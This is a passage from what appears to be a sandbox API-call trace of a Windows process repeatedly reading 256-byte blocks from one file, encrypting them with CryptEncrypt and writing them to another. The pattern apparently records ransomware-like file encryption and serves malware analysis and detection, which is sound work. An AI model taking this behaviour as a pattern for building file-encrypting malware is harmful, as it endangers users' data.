hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.433] GetLastError () returned 0x0 [0153.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.433] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.433] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.433] GetLastError () returned 0x0 [0153.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.433] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.433] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.433] GetLastError () returned 0x0 [0153.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.433] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.433] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.433] GetLastError () returned 0x0 [0153.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.433] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.433] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.433] GetLastError () returned 0x0 [0153.433] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.434] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.434] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.434] GetLastError () returned 0x0 [0153.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.434] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.434] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.434] GetLastError () returned 0x0 [0153.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.434] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.434] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.434] GetLastError () returned 0x0 [0153.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.434] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.434] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.434] GetLastError () returned 0x0 [0153.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.434] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.434] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.434] GetLastError () returned 0x0 [0153.434] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.434] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.434] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.434] GetLastError () returned 0x0 [0153.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.435] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.435] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.435] GetLastError () returned 0x0 [0153.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.435] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.435] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.435] GetLastError () returned 0x0 [0153.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.435] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.435] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.435] GetLastError () returned 0x0 [0153.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.435] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.435] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.435] GetLastError () returned 0x0 [0153.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.435] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.435] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.435] GetLastError () returned 0x0 [0153.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.435] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.435] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.435] GetLastError () returned 0x0 [0153.435] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.435] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.436] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.436] GetLastError () returned 0x0 [0153.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.436] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.436] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.436] GetLastError () returned 0x0 [0153.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.436] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.436] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.436] GetLastError () returned 0x0 [0153.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.436] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.436] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.436] GetLastError () returned 0x0 [0153.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.436] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.436] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.436] GetLastError () returned 0x0 [0153.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.436] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.436] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.436] GetLastError () returned 0x0 [0153.436] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.436] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.437] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.437] GetLastError () returned 0x0 [0153.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.437] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.437] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.437] GetLastError () returned 0x0 [0153.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.437] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.437] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.437] GetLastError () returned 0x0 [0153.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.437] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.437] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.437] GetLastError () returned 0x0 [0153.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.437] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.437] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.437] GetLastError () returned 0x0 [0153.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.437] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.437] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.437] GetLastError () returned 0x0 [0153.437] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.437] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.437] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.437] GetLastError () returned 0x0 [0153.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.438] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.438] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.438] GetLastError () returned 0x0 [0153.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.438] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.438] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.438] GetLastError () returned 0x0 [0153.438] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.438] ReadFile (in: hFile=0x1624, lpBuffer=0x29012d8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012d8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.438] CryptEncrypt (in: hKey=0x9ad838, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.438] 